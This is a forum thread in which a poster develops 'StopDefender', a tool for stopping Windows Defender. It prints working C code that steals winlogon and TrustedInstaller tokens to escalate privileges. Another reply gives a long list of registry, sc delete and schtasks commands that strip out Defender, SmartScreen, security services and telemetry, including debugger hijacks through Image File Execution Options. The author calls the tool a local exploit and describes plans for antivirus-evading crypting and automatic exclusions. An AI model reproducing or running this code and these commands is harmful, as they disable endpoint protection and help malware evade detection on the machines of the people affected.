Partially fixed stopping and unloading more on-demand drivers as in the code headers file: Code: #pragma once #include <windows.h> #include <iostream> #include <tchar.h> using namespace std; #ifdef UNICODE #define get_username get_usernameW #else #define get_username get_usernameA #endif #define DEF_SERVICES_COUNT 7 const PCTSTR DefenderServices[] = { TEXT("Sense"), TEXT("WdBoot"), TEXT("WdFilter"), TEXT("Wscsvc"), TEXT("WinDefend"), TEXT("WdNisSvc"), TEXT("WdNisDrv"), }; wstring get_usernameW(); string get_usernameA(); BOOL StopDefenderService(); int GetProcessByName(PCTSTR name); I've read from the RFC that it's all services in Windows 11. There's no longer a need to click on start to stop the defender on a failed attempt. From the console, just invoke the program again, and from windows click the stop button. I'll integrate all the files when I'm done. For now, still a testing phase and many interesting conclusions. I attach a fixed, useful, but still not final version.... In summary, all you need to do is replace the StopDefender.exe file
The code contained in cmdt.c contains three functions that perform various actions related to Windows processes and services. Below is a general description of how each of them works: Spoofing_System: This function attempts to impersonate system-level permissions. First, it tries to set certain permissions ("SeDebugPrivilege" and "SeImpersonatePrivilege"), and then obtains the PID of the "winlogon.exe" process. It then opens this process, retrieves its token, duplicates it, and finally impersonates the logged-in user using this token. Such techniques are used in software exploits and malicious code, as impersonating system-level processes can potentially give the code top-level privileges. Start_TI_Service: This function attempts to start the "TrustedInstaller" service. It first opens the service control manager and then opens the "TrustedInstaller" service. Then it checks the current state of the service. If the service is stopped, it tries to start it. If the service is in a waiting state, it waits for the current operation to finish. If the service is already running, it simply returns its PID. The function handles errors at each stage and returns the corresponding error codes. PS_Create_As_TI: This function creates a new process using the "TrustedInstaller" service token. This allows the new process to run with the same permissions as the "TrustedInstaller" service. The function first sets the specified permissions and then opens the process with the specified PID (the PID of the "TrustedInstaller" service, which should be returned by the Start_TI_Service function). It then duplicates the process token and uses it to create a new process. In general, this code performs operations that are used for privilege escalation - it tries to obtain higher-level privileges by impersonating system-level processes or the "TrustedInstaller" service. Improper use of such techniques can lead to security vulnerabilities or breaches. That's why Eset warns! Code: void Spoofing_System() { Set_Permission(L"SeDebugPrivilege"); Set_Permission(L"SeImpersonatePrivilege"); auto systemPid = Get_PID_by_Name(L"winlogon.exe"); HANDLE hSystemProcess; if ((hSystemProcess = OpenProcess( PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION, FALSE, systemPid)) == NULL) { return -1; } HANDLE hSystemToken; if (!OpenProcessToken( hSystemProcess, MAXIMUM_ALLOWED, &hSystemToken)) { CloseHandle(hSystemProcess); return GetLastError(); } HANDLE hDupToken; SECURITY_ATTRIBUTES tokenAttributes; tokenAttributes.nLength = sizeof(SECURITY_ATTRIBUTES); tokenAttributes.lpSecurityDescriptor = NULL; tokenAttributes.bInheritHandle = FALSE; if (!DuplicateTokenEx( hSystemToken, MAXIMUM_ALLOWED, &tokenAttributes, SecurityImpersonation, TokenImpersonation, &hDupToken)) { CloseHandle(hSystemToken); return GetLastError(); } if (!ImpersonateLoggedOnUser(hDupToken)) { CloseHandle(hDupToken); CloseHandle(hSystemToken); return GetLastError(); } CloseHandle(hDupToken); CloseHandle(hSystemToken); } DWORD Start_TI_Service() { SC_HANDLE hSCManager; if ((hSCManager = OpenSCManagerW( NULL, SERVICES_ACTIVE_DATABASE, GENERIC_EXECUTE)) == NULL) { return GetLastError(); } SC_HANDLE hService; if ((hService = OpenServiceW( hSCManager, L"TrustedInstaller", GENERIC_READ | GENERIC_EXECUTE)) == NULL) { CloseServiceHandle(hSCManager); return GetLastError(); } SERVICE_STATUS_PROCESS statusBuffer; DWORD bytesNeeded; while (QueryServiceStatusEx( hService, SC_STATUS_PROCESS_INFO, (LPBYTE)&statusBuffer, sizeof(SERVICE_STATUS_PROCESS), &bytesNeeded)) { if (statusBuffer.dwCurrentState == SERVICE_STOPPED) { if (!StartServiceW(hService, 0, NULL)) { CloseServiceHandle(hService); CloseServiceHandle(hSCManager); return GetLastError(); } } if (statusBuffer.dwCurrentState == SERVICE_START_PENDING || statusBuffer.dwCurrentState == SERVICE_STOP_PENDING) { Sleep(statusBuffer.dwWaitHint); continue; } if (statusBuffer.dwCurrentState == SERVICE_RUNNING) { CloseServiceHandle(hService); CloseServiceHandle(hSCManager); return statusBuffer.dwProcessId; } } CloseServiceHandle(hService); CloseServiceHandle(hSCManager); return GetLastError(); } void PS_Create_As_TI(DWORD pid, wchar_t* commandLine) { Set_Permission(L"SeDebugPrivilege"); Set_Permission(L"SeImpersonatePrivilege"); Spoofing_System(); HANDLE hTIProcess; if ((hTIProcess = OpenProcess( PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION, FALSE, pid)) == NULL) { return GetLastError(); } HANDLE hTIToken; if (!OpenProcessToken( hTIProcess, MAXIMUM_ALLOWED, &hTIToken)) { CloseHandle(hTIProcess); return GetLastError(); } HANDLE hDupToken; SECURITY_ATTRIBUTES tokenAttributes; tokenAttributes.nLength = sizeof(SECURITY_ATTRIBUTES); tokenAttributes.lpSecurityDescriptor = NULL; tokenAttributes.bInheritHandle = FALSE; if (!DuplicateTokenEx( hTIToken, MAXIMUM_ALLOWED, &tokenAttributes, SecurityImpersonation, TokenImpersonation, &hDupToken)) { CloseHandle(hTIToken); return GetLastError(); } STARTUPINFOW startupInfo; ZeroMemory(&startupInfo, sizeof(STARTUPINFOW)); startupInfo.lpDesktop = L"Winsta0\\Default"; PROCESS_INFORMATION processInfo; ZeroMemory(&processInfo, sizeof(PROCESS_INFORMATION)); if (!CreateProcessWithTokenW( hDupToken, LOGON_WITH_PROFILE, NULL, commandLine, CREATE_UNICODE_ENVIRONMENT, NULL, NULL, &startupInfo, &processInfo)) { return GetLastError(); } }
I will try it soon , i'm hating windows defender on win 10 putting some of my file in quarantine , just to name one nirsoft produkey. Just a question if i understand correctly, if i disable/stop the service on a pc(hdd) will be disabled forever until i re enable/start it ? Even if i put the same hdd on another pc ?
Described dozens of times on the removal of the defender. Simply Delete Defender folder and in the autoloader delete download links that are already not working. Spoiler: REMOVING WINDOWS DEFENDER reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /f reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f reg add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v DontReportInfectionInformation /t REG_DWORD /d 1 /f reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /f reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d 1 /f reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t REG_DWORD /d 1 /f reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SecHealthUI.exe" /v Debugger /t REG_SZ /d "%windir%\System32\taskkill.exe" /f install_wim_tweak /o /c Windows-Defender /r reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d 0 /f reg delete "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f Spoiler: REMOVING TELEMETRY sc delete DiagTrack sc delete dmwappushservice sc delete WerSvc sc delete OneSyncSvc sc delete MessagingService sc delete wercplsupport sc delete PcaSvc sc config wlidsvc start=demand sc delete wisvc sc delete RetailDemo sc delete diagsvc sc delete shpamsvc sc delete TermService sc delete UmRdpService sc delete SessionEnv sc delete TroubleshootingSvc for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "wscsvc" ^| find /i "wscsvc"') do (reg delete %I /f) for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "OneSyncSvc" ^| find /i "OneSyncSvc"') do (reg delete %I /f) for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "MessagingService" ^| find /i "MessagingService"') do (reg delete %I /f) for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "PimIndexMaintenanceSvc" ^| find /i "PimIndexMaintenanceSvc"') do (reg delete %I /f) for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "UserDataSvc" ^| find /i "UserDataSvc"') do (reg delete %I /f) for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "UnistoreSvc" ^| find /i "UnistoreSvc"') do (reg delete %I /f) for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "BcastDVRUserService" ^| find /i "BcastDVRUserService"') do (reg delete %I /f) for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "Sgrmbroker" ^| find /i "Sgrmbroker"') do (reg delete %I /f) sc delete diagnosticshub.standardcollector.service reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Siuf\Rules" /v "NumberOfSIUFInPeriod" /t REG_DWORD /d 0 /f reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Siuf\Rules" /v "PeriodInNanoSeconds" /f reg add "HKLM\SYSTEM\ControlSet001\Control\WMI\AutoLogger\AutoLogger-Diagtrack-Listener" /v Start /t REG_DWORD /d 0 /f reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v AITEnable /t REG_DWORD /d 0 /f reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v DisableInventory /t REG_DWORD /d 1 /f reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v DisablePCA /t REG_DWORD /d 1 /f reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v DisableUAR /t REG_DWORD /d 1 /f reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d 0 /f reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t REG_DWORD /d 0 /f reg add "HKCU\Software\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d 0 /f reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRecentDocsHistory" /t REG_DWORD /d 1 /f reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CompatTelRunner.exe" /v Debugger /t REG_SZ /d "%windir%\System32\taskkill.exe" /f reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DeviceCensus.exe" /v Debugger /t REG_SZ /d "%windir%\System32\taskkill.exe" /f Spoiler: SCHEDULED TASKS schtasks /Change /TN "Microsoft\Windows\AppID\SmartScreenSpecific" /disable schtasks /Change /TN "Microsoft\Windows\Application Experience\AitAgent" /disable schtasks /Change /TN "Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" /disable schtasks /Change /TN "Microsoft\Windows\Application Experience\ProgramDataUpdater" /disable schtasks /Change /TN "Microsoft\Windows\Application Experience\StartupAppTask" /disable schtasks /Change /TN "Microsoft\Windows\Autochk\Proxy" /disable schtasks /Change /TN "Microsoft\Windows\CloudExperienceHost\CreateObjectTask" /disable schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\BthSQM" /disable schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\Consolidator" /disable schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask" /disable schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" /disable schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\UsbCeip" /disable schtasks /Change /TN "Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector" /disable schtasks /Change /TN "Microsoft\Windows\DiskFootprint\Diagnostics" /disable schtasks /Change /TN "Microsoft\Windows\FileHistory\File History (maintenance mode)" /disable schtasks /Change /TN "Microsoft\Windows\Maintenance\WinSAT" /disable schtasks /Change /TN "Microsoft\Windows\PI\Sqm-Tasks" /disable schtasks /Change /TN "Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem" /disable schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyMonitor" /disable schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyRefresh" /disable schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyUpload" /disable schtasks /Change /TN "Microsoft\Windows\Windows Error Reporting\QueueReporting" /disable schtasks /Change /TN "Microsoft\Windows\WindowsUpdate\Automatic App Update" /disable schtasks /Change /TN "Microsoft\Windows\License Manager\TempSignedLicenseExchange" /disable schtasks /Change /TN "Microsoft\Windows\Clip\License Validation" /disable schtasks /Change /TN "\Microsoft\Windows\ApplicationData\DsSvcCleanup" /disable schtasks /Change /TN "\Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem" /disable schtasks /Change /TN "\Microsoft\Windows\PushToInstall\LoginCheck" /disable schtasks /Change /TN "\Microsoft\Windows\PushToInstall\Registration" /disable schtasks /Change /TN "\Microsoft\Windows\Shell\FamilySafetyMonitor" /disable schtasks /Change /TN "\Microsoft\Windows\Shell\FamilySafetyMonitorToastTask" /disable schtasks /Change /TN "\Microsoft\Windows\Shell\FamilySafetyRefreshTask" /disable schtasks /Change /TN "\Microsoft\Windows\Subscription\EnableLicenseAcquisition" /disable schtasks /Change /TN "\Microsoft\Windows\Subscription\LicenseAcquisition" /disable schtasks /Change /TN "\Microsoft\Windows\Diagnosis\RecommendedTroubleshootingScanner" /disable schtasks /Change /TN "\Microsoft\Windows\Diagnosis\Scheduled" /disable schtasks /Change /TN "\Microsoft\Windows\NetTrace\GatherNetworkInfo" /disable del /F /Q "C:\Windows\System32\Tasks\Microsoft\Windows\SettingSync\*"
I don't know if you all read the article. I tested DefCon and nothing has changed. Tamper Protection must be turned off. In my case it doesn't have to because why should it? I can make an option to make the program work in service mode and permanently disable Defender. However, this was not the concept. From the beginning I created two versions, where the console version is the most important because it allows, despite numerous restrictions, having administrator rights on a remote machine in the network to disable Defender (and more). Convenience for administrators of server versions, etc.. This program is actually a local exploit that impersonates trusted Microsoft services/processes. I know more or less how the next systems will turn out. If the Tamper Protection option becomes unmovable with the SecureBot flag - you have a problem. And I'm working on a decent installer that bypasses first run protection and exception creation. If I succeed I will put it up. The disabling option is a much-talked-about topic, and there is no need to fry another thread on it. The option to stop this type of service is another tale. Those who are well acquainted with psexec tools from the pstools stable know what powers this program has
Released version 1.03 Added automatic exception insertion into trusted programs. Regardless of file name and location. Passes the Tamper Protection Test - nothing needs to be changed. Version 1.04 will get a non-standard PE-crypter to make the program as undetectable as possible. For x64 version, the program is downloaded from the x64 folder Best regards, Marek P.S - multilingual installer on YT P.S. 2 - If one starts with user rights, the new Gui (StopDefenderGui.zip) will ask for an administrator, otherwise restarting the service would not be possible
I am still not able to understand if I open cmd with nsudo[*] and try to execute such a command kill service WinDefend bla bla ... it will fail what did you do to make it succeed? [*] NSudoLC.exe -U:T -P:E
Stopping or modifying Windows Defender requires system-level permissions, which are reserved for the TrustedInstaller account. But in Windows 10/11 if you impersonate TrustedInstaller, you have to push through other security layers that prevent such actions. Mandatory Integrity Control (MIC) is one such layer that pigeonholes objects (such as files or processes) into different integrity levels (low, medium, high, system), thus limiting interactions between them. Discretionary Access Control (DAC) is another layer of security that allows the owner of an object to decide who has access to it. This control is more granular and allows you to specify precisely which user accounts and groups have access to specific objects and what operations they can perform on them. In Windows 11, Microsoft also used techniques such as Control Flow Guard (CFG), which prevents attacks that modify a program's control flow, and Device Guard, which restricts the system to run only trusted software. The system for writing such an exploit gets heavily complicated, and is difficult to circumvent, just impersonating TrustedInstaller is not enough The code I've shown is an example of how to get the privileges of a Windows user who has the ability to stop the Windows Defender service. The program does this by manipulating process security tokens. The main steps of this code are: Using the ImpersonateProcessTokenByName() function to find and pretend the winlogon.exe system process has high privileges, and ImpersonateLoggedOnUser() allows the current thread to operate from the winlogon.exe perspective. Call ImpersonateProcessTokenByName() again, but this time to pretend to be the lsass.exe process. lsass.exe is the system process responsible for system security, including user authorization and authentication. Using the CreateTokenWinDefend() function to create a new token that authenticates the process as having the privileges of the "WinDefend" and "TrustedInstaller" services. This is crucial, because these services have permissions to stop the Windows Defender service. Impersonate using the token created in the previous step via ImpersonateLoggedOnUser(). At this point, the current process is running from the perspective of the "WinDefend" and "TrustedInstaller" services. Stopping the Windows Defender service behind the StopDefenderService() function. This is possible thanks to the permissions that the program acquired in the previous steps. Now I think everything is clear
i never posted on this forum, despite looking at it alot and from 2017 account. but thats the first time i saw someone really doing the job with excellence, gz sadly it is not long-term due to driver sign, you already done too much, but is there an possibility to not require an driver?